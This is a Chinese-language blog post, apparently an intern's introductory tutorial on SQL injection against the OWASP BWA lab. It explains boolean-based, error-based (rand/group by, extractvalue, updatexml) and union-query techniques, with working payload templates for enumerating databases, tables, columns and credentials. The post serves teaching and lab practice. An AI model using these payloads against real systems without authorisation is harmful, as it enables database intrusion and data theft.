<!doctype html><html lang="zh-cn"><head><meta http-equiv="Content-Type" content="text/html" charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="author" content="song"><meta name="description" content="SQL 注入 详解"><title>SQL 注入详解 | 渔人</title><link rel="alternate" href="/blog/rss.xml" title="渔人"><link rel="shortcut icon" href="/images/favicon.ico"><link rel="stylesheet" href="/css/all.min.css"></head><body><div class="post"><h1 class="overview"><a href="/blog/rss.xml" class="web-feed" title="RSS订阅" target="_blank"></a> <i class="search-icon"></i> <a href="/">渔人</a> <font>» </font><a href="/blog">博客</a> <font>» </font><a href="/blog/archives">归档</a><div class="big-search"><i class="close-icon"></i><div class="search-container"><form class="search-form"><input class="search-input js-search-input" type="text" placeholder="请输入关键字"></form><div class="js-search-results"></div></div></div></h1><div class="post-info"><h1>SQL 注入详解</h1><div class="author-info"><p class="author">作者:<a href="/">宋进忠</a></p><p class="date">时间: <span>2016/10/01</span></p><p class="cat-arc"><span>分类: <a href="/blog/categories/Web安全/">Web安全</a> </span><span>标签: <a href="/blog/tags/Web安全/">Web安全</a> / <a href="/blog/tags/SQL注入/">SQL注入</a></span></p></div></div><div class="post-markdown"><p>从今年(2016) 6 月初来到南京( 841 研究所)实习，到现在四个月过去了，期间主要的工作还是研究 WEB 安全，编程语言是 Python，常用到正则表达式，对 HTTP 的协议也非常清晰。</p><p><img class="img-mid" src="http://ww2.sinaimg.cn/mw690/e3dde130gw1f8hsvng0gcj20zk0o6k1e.jpg" alt="图片来源网上" title="图片来源于网络"></p><p>刚过来的时候，研究的主要是 SQL 注入，因为之前没有搞过安全，所有费了好长一段时间对 SQL 注入基本知识进行了解。<strong>这篇文章并不是什么很深入的技术博客，或许应该叫它‘ SQL注入扫盲 ’</strong>。</p><h2 id="关于-SQL-Injection"><a href="#关于-SQL-Injection" class="headerlink" title="关于 SQL Injection"></a>关于 SQL Injection</h2><p>SQL Injection 就是通过把恶意的 SQL 命令插入到 Web 表单让服务器执行，最终达到欺骗服务器或数据库执行恶意的 SQL 命令。</p><p>学习 SQL 注入，首先要搭一个靶机环境，我使用的是 <a href="https://www.owasp.org/index.php/GPC_Project_Details/OWASP_BWA_Project">OWASP BWA</a>，感兴趣的可以去官网下载一个安装，除了 SQL 注入，很多靶机环境都可以在 BWA 中找到，它专门为 <a href="https://github.com/zaproxy/zaproxy">OWASP ZAP</a> 渗透工具设计的。</p><figure class="highlight perl"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><code class="perl">$id = $_GET[<span class="string">'id'</span>];
$getid = <span class="string">"SELECT first_name, last_name FROM users WHERE user_id = '$id'"</span>;
$result = mysql_query($getid) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">'&lt;pre&gt;'</span> . mysql_error() . <span class="string">'&lt;/pre&gt;'</span> );
$num = mysql_numrows($result);</code></pre></td></tr></table></figure><p>这是一个很简单的 PHP代码，从前台获得 <code>id</code> 的值，交给数据库来执行，把结果返回给前台。</p><p>比如我们在 OWASP 里输入 <code>id = 1</code>，点击 Submit，返回结果如下：</p><p><img src="/content/images/2016/10/p1.png" alt=""></p><p>稍微懂一点后台或者数据库的人都知道，上面的那段代码是有严重问题的，<strong>没有对 id 的值进行有效性、合法性判断</strong>。也就是说，我们在 submit 输入框输入的如何内容都会被提交给数据库执行，比如在输入框输入<code>1&#39; or &#39;1&#39;=&#39;1</code>，执行就会变成：</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><code class="sql">//原先要在数据库中执行的命令
<span class="keyword">SELECT</span> first_name, last_name <span class="keyword">FROM</span> <span class="keyword">users</span> <span class="keyword">WHERE</span> user_id = <span class="string">'1'</span>
//变成
<span class="keyword">SELECT</span> first_name, last_name <span class="keyword">FROM</span> <span class="keyword">users</span> <span class="keyword">WHERE</span> user_id = <span class="string">'1'</span> <span class="keyword">or</span> <span class="string">'1'</span>=<span class="string">'1'</span></code></pre></td></tr></table></figure><p><strong>注意一下单引号，这是 SQL 注入中非常重要的一个地方，所以注入代码的最后要补充一个 <code>&#39;1&#39;=&#39;1</code>让单引号闭合。</strong></p><p>由于 or 的执行，会把数据库表 users 中的所有内容显示出来，</p><p><img src="/content/images/2016/10/p2.png" alt=""></p><p>下面对三种主要的注入类型进行介绍。</p><h2 id="Boolean-based-原理分析"><a href="#Boolean-based-原理分析" class="headerlink" title="Boolean-based 原理分析"></a>Boolean-based 原理分析</h2><p>首先不得不讲SQL中的AND和OR<br>AND 和 OR 可在 WHERE 子语句中把两个或多个条件结合起来。<br>AND:返回第一个条件和第二个条件都成立的记录。<br>OR:返回满足第一个条件或第二个条件的记录。<br>AND和OR即为集合论中的交集和并集。<br>下面是一个数据库的查询内容。</p><figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><code class="asciidoc"><span class="section">mysql&gt; select * from students;
+-------+-------+-----+</span>
<span class="section">| id    | name  | age |
+-------+-------+-----+</span>
| 10056 | Doris |  20 |
| 10058 | Jaune |  22 |
<span class="section">| 10060 | Alisa |  29 |
+-------+-------+-----+</span>
3 rows in set (0.00 sec)</code></pre></td></tr></table></figure><p>1)</p><figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><code class="asciidoc"><span class="section">mysql&gt; select * from students where TRUE ;
+-------+-------+-----+</span>
<span class="section">| id    | name  | age |
+-------+-------+-----+</span>
| 10056 | Doris |  20 |
| 10058 | Jaune |  22 |
<span class="section">| 10060 | Alisa |  29 |
+-------+-------+-----+</span>
3 rows in set (0.00 sec)</code></pre></td></tr></table></figure><p>2)</p><figure class="highlight oxygene"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><code class="oxygene">mysql&gt; <span class="keyword">select</span> * <span class="keyword">from</span> students <span class="keyword">where</span> <span class="keyword">FALSE</span> ;
<span class="keyword">Empty</span> <span class="keyword">set</span> (<span class="number">0.00</span> sec)</code></pre></td></tr></table></figure><p>3)</p><figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><code class="asciidoc"><span class="section">mysql&gt; SELECT * from students where id = 10056 and TRUE ;
+-------+-------+-----+</span>
<span class="section">| id    | name  | age |
+-------+-------+-----+</span>
<span class="section">| 10056 | Doris |  20 |
+-------+-------+-----+</span>
1 row in set (0.00 sec)</code></pre></td></tr></table></figure><p>4)</p><figure class="highlight oxygene"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><code class="oxygene">mysql&gt; <span class="keyword">select</span> * <span class="keyword">from</span> students <span class="keyword">where</span> id = <span class="number">10056</span> <span class="keyword">and</span> <span class="keyword">FALSE</span> ;
<span class="keyword">Empty</span> <span class="keyword">set</span> (<span class="number">0.00</span> sec)</code></pre></td></tr></table></figure><p>5)</p><figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><code class="asciidoc"><span class="section">mysql&gt; selcet * from students where id = 10056 or TRUE ;
+-------+-------+-----+</span>
<span class="section">| id    | name  | age |
+-------+-------+-----+</span>
| 10056 | Doris |  20 |
| 10058 | Jaune |  22 |
<span class="section">| 10060 | Alisa |  29 |
+-------+-------+-----+</span>
3 rows in set (0.00 sec)</code></pre></td></tr></table></figure><p>6)</p><figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><code class="asciidoc"><span class="section">mysql&gt; select * from students where id = 10056 or FALSE ;
+-------+-------+-----+</span>
<span class="section">| id    | name  | age |
+-------+-------+-----+</span>
<span class="section">| 10056 | Doris |  20 |
+-------+-------+-----+</span>
1 row in set (0.00 sec)</code></pre></td></tr></table></figure><p><strong>会发现and 1=1 , and 1=2 即是 and TRUE , and FALSE 的变种。</strong><br><strong>这便是最基础的boolean注入,以此为基础你可以自由组合语句。</strong></p><p>字典爆破流</p><figure class="highlight oxygene"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><code class="oxygene"><span class="keyword">and</span> exists(<span class="keyword">select</span> * <span class="keyword">from</span> ?)     <span class="comment">//?为猜测的表名</span>
<span class="keyword">and</span> exists(<span class="keyword">select</span> ? <span class="keyword">from</span> x)     <span class="comment">//?为猜测的列名</span></code></pre></td></tr></table></figure><p>截取二分流</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><code class="sql">and (length((<span class="keyword">select</span> schema_name <span class="keyword">from</span> information_schema.schemata <span class="keyword">limit</span> <span class="number">1</span>))&gt;?)       //判断数据库名的长度
<span class="keyword">and</span> (<span class="keyword">substr</span>((<span class="keyword">select</span> schema_name <span class="keyword">from</span> information_schema.schemata <span class="keyword">limit</span> <span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)&gt;<span class="string">'?'</span>)
<span class="keyword">and</span> (<span class="keyword">substr</span>((<span class="keyword">select</span> schema_name <span class="keyword">from</span> information_schema.schemata <span class="keyword">limit</span> <span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)&lt;<span class="string">'?'</span>)      //利用二分法判断第一个字符</code></pre></td></tr></table></figure><h3 id="Boolean-based总结"><a href="#Boolean-based总结" class="headerlink" title="Boolean-based总结"></a>Boolean-based总结</h3><p>根据前面的介绍，我们知道，对于基于Boolean-based的注入，<strong>必须要有一个可以正常访问的地址</strong>，比如http: //redtiger.labs.overthewire.org/level4.php?id=1 是一个可以正常访问的记录，说明id=1的记录是存在的，下面的都是基于这个进一步猜测。先来判断一个关键字keyword的长度，在后面构造<strong>id=1 and (select length(keyword) from table)=1</strong>，从服务器我们会得到一个返回值，如果和先前的返回值不一样，说明and后面的<strong>(select length(keyword) from table)=1返回false</strong>，keyword的长度不等于1。继续构造直到id=1 and (select length(keyword) from table)=15返回true，说明keyword的长度为15。</p><p><strong>为什么我们刚开始一定要找一个已经存在的id，其实这主要是为了构造一个为真的情况。Boolean-based就是利用查询结果为真和为假时的不同响应，通过不断猜测来找到自己想要的东西。</strong></p><p>对于keyword的值，mysql数据库可以使用substr(string, start, length)函数，截取string从第start位开始的length个字符串id=1 and (select substr(keyword,1,1) from table) =’A’，依此类推，就可以获得keyword的在数据库中的值。<br>Boolean-based的效率很低，需要多个请求才能确定一个值，尽管这种代价可以通过脚本来完成，在有选择的情况下，我们会优先选择其他方式。</p><h2 id="Error-Based-原理分析"><a href="#Error-Based-原理分析" class="headerlink" title="Error Based 原理分析"></a>Error Based 原理分析</h2><h3 id="关于错误回显"><a href="#关于错误回显" class="headerlink" title="关于错误回显"></a>关于错误回显</h3><p>基于错误回显的sql注入就是<strong>通过sql语句的矛盾性来使数据被回显到页面上</strong>。</p><p>所用到的函数</p><figure class="highlight q"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><code class="q"><span class="built_in">count</span>() 统计元祖的个数（相当于求和）
如<span class="keyword">select</span> <span class="built_in">count</span>(*) <span class="keyword">from</span> information_schema.<span class="built_in">tables</span>;  

<span class="built_in">rand</span>()用于产生一个<span class="number">0</span>~<span class="number">1</span>的随机数  

<span class="built_in">floor</span>()向下取整  

<span class="built_in">group</span> <span class="keyword">by</span> 依据我们想要的规矩对结果进行分组  

concat将符合条件的同一列中的不同行数据拼接，以逗号隔开</code></pre></td></tr></table></figure><h3 id="用于错误回显的sql语句"><a href="#用于错误回显的sql语句" class="headerlink" title="用于错误回显的sql语句"></a>用于错误回显的sql语句</h3><p><strong>第一种： 基于 rand() 与 group by 的错误</strong></p><p>利用group by part of rand() returns duplicate key error这个bug，关于rand()函数与group by 在mysql中的错误报告如下：</p><p><strong>RAND() in a WHERE clause is re-evaluated every time the WHERE is executed.<br>You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times.</strong></p><p>这个bug会爆出duplicate key这个错误，然后顺便就把数据偷到了。<br>公式：<strong>username=admin’ and (select 1 from (select count(<em>), concat(floor(rand(0)</em>2),0x23,(你想获取的数据的sql语句))x from information_schema.tables group by x )a) and ‘1’ = ‘1</strong></p><p><strong>第二种： XPATH爆信息</strong></p><p>这里主要用到的是ExtractValue()和UpdateXML()这2个函数，由于mysql 5.1以后提供了内置的XML文件解析和函数，所以这种注入只能用于5.1版本以后使用</p><p>查看sql手册</p><figure class="highlight crmsh"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><code class="crmsh">语法：EXTRACTVALUE (XML_document, XPath_string);
第一个参数：XML_document是<span class="keyword">String</span>格式，为XML文档对象的名称，文中为Doc
第二个参数：XPath_string (<span class="keyword">Xpath</span>格式的字符串) ，如果不了解<span class="keyword">Xpath</span>语法，可以在网上查找教程。</code></pre></td></tr></table></figure><p>作用：从目标XML中返回包含所查询值的字符串</p><figure class="highlight ceylon"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><code class="ceylon">语法:UPDATEXML (XML<span class="number">_</span>document, XPath<span class="number">_</span>string, <span class="keyword">new</span><span class="number">_</span><span class="keyword">value</span>);
第一个参数：XML<span class="number">_</span>document是String格式，为XML文档对象的名称，文中为Doc
第二个参数：XPath<span class="number">_</span>string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。
第三个参数：<span class="keyword">new</span><span class="number">_</span><span class="keyword">value</span>，String格式，替换查找到的符合条件的数据</code></pre></td></tr></table></figure><p>作用：改变文档中符合条件的节点的值</p><p>现在就很清楚了，我们只需要不满足XPath_string(Xpath格式)就可以了，但是由于这个方法只能爆出32位，所以可以结合mid来使用<br>公式1：<strong>username=admin’ and (extractvalue(1, concat(0x7e,(你想获取的数据的sql语句)))) and ‘1’=’1</strong><br>公式2：<strong>username=admin’ and (updatexml(1, concat(0x7e,(你想获取的数据的sql语句)),1)) and ‘1’=’1</strong></p><p>基于错误回显的注入，总结起来就一句话，通过sql语句的矛盾性来使数据被回显到页面上，但有时候局限于回显只能回显一条，导致基于错误的注入偷数据的效率并没有那么高，但相对于布尔注入已经提高了一个档次。</p><h2 id="union-query-injection"><a href="#union-query-injection" class="headerlink" title="union query injection"></a>union query injection</h2><p>要了解union query injection，首先得了解union查询，union用于合并两个或更多个select的结果集。比如说</p><pre><code>SELECT username, password FROM account;
</code></pre><p>结果是</p><p><code>admin 123456</code></p><pre><code>SELECT id, title FROM article
</code></pre><p>的结果是</p><p><code>1 Hello, World</code></p><pre><code>SELECT username, password FROM account
UNION 
SELECT id, title FROM article
</code></pre><p>的结果就是</p><p><code>admin 123456</code></p><p><code>1 Hello, World</code></p><p>比起多重嵌套的boolean注入，union注入相对轻松。因为，union注入可以直接返回信息而不是布尔值。<strong>前面的介绍看出把union会把结果拼拼到一起，所有要让union前面的查询返回一个空值，一般采用类似于id=-1的方式。</strong></p><p>1)</p><figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><code class="asciidoc"><span class="section">mysql&gt; select name from students where id = -1 union select schema_name from information_schema.schemata;   //数据库名  
+--------------------+</span>
<span class="section">| name               |
+--------------------+</span>
| information<span class="emphasis">_schema |
| mysql              |
| performance_</span>schema |
| rumRaisin          |
| t3st               |
<span class="section">| test               |
+--------------------+</span>
6 rows in set (0.00 sec)</code></pre></td></tr></table></figure><p>2)</p><figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><code class="asciidoc"><span class="section">mysql&gt; select name from students where id = -1 union select table_name from information_schema.tables where table_schema='t3st';    //表名
+----------+</span>
<span class="section">| name     |
+----------+</span>
| master   |
<span class="section">| students |
+----------+</span>
2   rows in set (0.00 sec)</code></pre></td></tr></table></figure><p>3)</p><figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><code class="asciidoc"><span class="section">mysql&gt; select name from students where id = -1 union select column_name from information_schema.columns where table_name = 'students' ;     //列名
+------+</span>
<span class="section">| name |
+------+</span>
| id   |
| name |
<span class="section">| age  |
+------+</span>
3 rows in set (0.00 sec)</code></pre></td></tr></table></figure><p>UNION 操作符用于合并两个或多个 SELECT 语句的结果集。<strong>请注意，UNION 内部的 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 SELECT 语句中的列的顺序必须相同。</strong></p><p>举个例子，还以最开始的 OWASP 为基础，返回了两个值分别是 first_name 和 sur_name，可想而知，服务器在返回数据库的查询结果时，就会把结果中的第一个值和第二个值传给 first_name 和 sur_name，多了或少了，都会引起报错。</p><p>所以你如果想要使用union查询来进行注入，你首先要猜测后端查询语句中查询了多少列，哪些列可以回显给用户。</p><p>猜测列数</p><figure class="highlight crystal"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><code class="crystal">-<span class="number">1</span> <span class="class"><span class="keyword">union</span> <span class="title">select</span> 1</span>
-<span class="number">1</span> <span class="class"><span class="keyword">union</span> <span class="title">select</span> 1,2</span>
-<span class="number">1</span> <span class="class"><span class="keyword">union</span> <span class="title">select</span> 1,2,3</span>
/<span class="regexp">/直到页面正常显示</span></code></pre></td></tr></table></figure><p>比如这条语句</p><pre><code>-1 UNION SELECT 1,2,3,4
</code></pre><p>如果显示的值为3和4，表示该查询结果中有四列，并且第三列和第四列是有用的。则相应的构造union语句如下</p><pre><code>-1 UNION SELECT 1,2,username,password FROM table
</code></pre><h2 id="小结一下"><a href="#小结一下" class="headerlink" title="小结一下"></a>小结一下</h2><p>SQL 注入大概有5种，还有两种分别是 Stacked_queries(基于堆栈)和 Time-based blind(时间延迟)，堆栈就是多语句查询，用 ‘;’ 把语句隔开，和 union 一样；时间延迟就是利用 sleep() 函数让数据库延迟执行，偷数据的速度很慢。(还有一个第六种，内联注入，但和前面涉及的内容有所重叠，就不单独来讨论了)</p><p><strong>引用说明</strong>，自己之前研究 SQL 注入的时候，也是一点一点摸索的，本博客的大部分内容是来自于公司内网的服务器中(公司定期考核，看你都干了什么)。当时因为是内网，就没有做引用，现在想找到这些引用的文章也很困难，见谅。</p></div><div class="pre-next clear"><div class="next-page"><a href="/blog/2016/09/28/原型链/">JS 进阶之路 : 原型链</a> <i class="next-icon"></i></div></div><div class="post-footer"><a href="/blog/rss.xml" class="post-feed" target="_black">Feed <i class="feed-icon"></i></a><h3>文档信息</h3><ul><li><span>版权声明：</span><span>自由转载-非商用-保持署名</span><a href="https://creativecommons.org/licenses/by-nc-nd/3.0/deed.zh">(创意共享3.0许可证)</a></li><li><span>发表日期：</span><span>2016-10-01 21:09:44</span></li><li><span>本文分类：</span><span> <a href="/blog/categories/Web安全/">Web安全</a></span></li><li><span>本文标签：</span><span> <a href="/blog/tags/Web安全/">Web安全</a> / <a href="/blog/tags/SQL注入/">SQL注入</a></span></li><li><span>最后编辑：</span><span>2016-10-05 23:24:43</span></li><li><span>社交媒体：</span><span><a href="https://github.com/songjinzhong">GitHub<i class="github"></i></a><a href="http://weibo.com/3822969136">微博<i class="weibo"></i></a></span></li><li><span>分享文章：</span> <span><div class="ds-share" data-thread-key="blog/2016/10/01/SQL注入详解/" data-title="SQL 注入详解" data-images="" data-content="从今年(2016) 6 月初来到南京( 841 研究所)实习，到现在四个月过去了，期间主要的工作还是研究 WEB 安全，编程语言是 Python，常用到正则表达式，对 HTTP 的协议也非常清晰。刚过来的时候，研究的主要是 SQL 注..." data-url="http://yuren.space/blog/2016/10/01/SQL注入详解/"><div class="ds-share-inline"><ul class="ds-share-icons-16"><li><a class="ds-weibo" href="javascript:void(0);" data-service="weibo">微博</a></li><li><a class="ds-qzone" href="javascript:void(0);" data-service="qzone">QQ空间</a></li><li><a class="ds-wechat" href="javascript:void(0);" data-service="wechat">微信</a></li></ul><div class="ds-share-icons-more"></div></div></div></span></li></ul></div><div class="page-related"><h2>相关文章</h2><ul><li><p>没有相关文章</p></li></ul></div><div class="duoshuo-part" id="comments"><div class="ds-thread" data-thread-key="blog/2016/10/01/SQL注入详解/" data-title="SQL 注入详解" data-url="http://yuren.space/blog/2016/10/01/SQL注入详解/"></div><style type="text/css">.ds-sync{white-space:normal}.ds-post{transition:all .3s!important}.ds-post:hover{transition:all .3s!important;border-radius:5px!important;background:#F3F3F3!important}#ds-thread #ds-reset .ds-comments{border-bottom:none;padding:15px 0}#ds-thread #ds-reset .ds-powered-by{display:none}.ds-thread .ds-loading{padding:20px 0;text-align:center;color:#AFAFAF;background-color:#EFEFEF;border-radius:5px;line-height:30px;font-style:15px}#ds-thread .ds-loading{display:none;height:0;visibility:hidden}#ds-thread #ds-reset .ds-comments{border-bottom:none}#ds-thread #ds-reset a:hover,.ds-like-panel{color:#999}#ds-reset .ds-avatar,#ds-reset .ds-avatar img{border-radius:100%}#ds-thread #ds-reset li.ds-post{border-top:none}div#ds-thread #ds-reset .ds-comment-body p{color:#000}#ds-thread #ds-reset .ds-comment-body a{color:#777!important}#ds-thread #ds-reset li.ds-tab a{text-shadow:none}#ds-thread #ds-reset .ds-sort a.ds-current,#ds-thread #ds-reset .ds-sort a:active{color:#e58c7c}#ds-thread #ds-reset .ds-post-self{border-top:none}.ds-thread-like-text{display:block}.ds-thread-cancel-like{display:none}.ds-thread-liked .ds-thread-like-text{display:none}.ds-thread-liked .ds-thread-cancel-like{display:block}#ds-thread #ds-reset img{transition:all .3s}#ds-thread #ds-reset img:hover{transform:rotate(180deg);transition:all .3s}div#ds-thread #ds-reset .ds-comment-body{color:#555}#ds-thread #ds-reset .ds-comment-body a[data-user-id='6314610027441160961']::after{content:"博主";border:1px solid #e58c7c;border-radius:2px;margin-left:4px;color:#e58c7c;padding:0 2px;font-size:12px;line-height:14px;display:inline-block}.ds-post-reply,.ds-post-repost{display:none}.ds-post-self:hover .ds-post-reply,.ds-post-self:hover .ds-post-repost{display:inline}.ds-user-name{font-size:14px!important;line-height:42px!important}.ds-children .ds-user-name{line-height:26px!important}div#ds-thread #ds-reset .ds-comment-body p{font-size:16px!important}div#ds-thread #ds-reset .ds-comment-header .ds-user-name{font-size:18px!important;font-family:consolas!important;line-height:30px!important}div#ds-thread #ds-reset .ds-textarea-wrapper textarea{height:120px!important;font-size:16px!important;font-family:Consolas,Georgia,serif}@media (max-width:800px){div#ds-thread #ds-reset .ds-textarea-wrapper textarea{height:70px!important}}div#ds-thread #ds-reset .ds-post-options{overflow:hidden}div#ds-thread #ds-reset .ds-post-toolbar{box-shadow:none}div#ds-thread #ds-reset .ds-post-button{position:relative;margin-top:20px;font-size:16px}div#ds-thread #ds-reset .ds-post-options{margin-right:0!important;border-right:1px solid #CCC}@media screen and (max-width:641px){div#ds-thread #ds-reset .ds-replybox{padding:0!important}div#ds-thread #ds-reset .ds-replybox .ds-avatar{display:none!important}.ds-post-self:hover .ds-post-reply,.ds-post-self:hover .ds-post-report,.ds-post-self:hover .ds-post-repost{display:none!important}}div#ds-thread #ds-reset .ds-comment-body p{white-space:pre-wrap;font-family:consolas!important}#ds-thread #ds-reset .ds-paginator a{font-size:20px!important}#ds-thread #ds-reset .ds-login-buttons p{color:#999}#ds-thread #ds-reset .ds-comment-body{background:#fbfbfb;padding:15px 15px 12px 32px;border-radius:5px;box-shadow:0 1px 2px rgba(0,0,0,.15),0 1px 0 rgba(255,255,255,.75) inset}</style><script type="text/javascript">var duoshuoQuery={short_name:"songjz"};!function(){var t=document.createElement("script");t.type="text/javascript",t.async=!0,t.src=("https:"==document.location.protocol?"https:":"http:")+"//static.duoshuo.com/embed.js",t.charset="UTF-8",(document.getElementsByTagName("head")[0]||document.getElementsByTagName("body")[0]).appendChild(t)}()</script></div><div class="web-info">Copyright © 2016-2017,本站由 <a href="/blog/web-info">本人</a> 手工打造,历时2周, <a href="/blog/web-info/#link">联系方式</a> <span>网站参考 <a href="http://www.barretlee.com/">小胡子哥</a>/ <a href="http://www.ruanyifeng.com/home.html">阮一峰老师</a></span></div></div><div class="tools"><i class="back-to-top" style="display:none"></i> <i class="goto-comments"></i></div><script src="/js/jquery-3.1.0.min.js"></script><script src="/js/all.min.js"></script><script>var _hmt=_hmt||[];!function(){var e=document.createElement("script");e.src="//hm.baidu.com/hm.js?513bc3e28555252418b03cc8e660bc31";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)}()</script><script>!function(e,t,a,n,c,o,s){e.GoogleAnalyticsObject=c,e[c]=e[c]||function(){(e[c].q=e[c].q||[]).push(arguments)},e[c].l=1*new Date,o=t.createElement(a),s=t.getElementsByTagName(a)[0],o.async=1,o.src=n,s.parentNode.insertBefore(o,s)}(window,document,"script","https://www.google-analytics.com/analytics.js","ga"),ga("create","UA-85346637-1","auto"),ga("send","pageview")</script></body></html>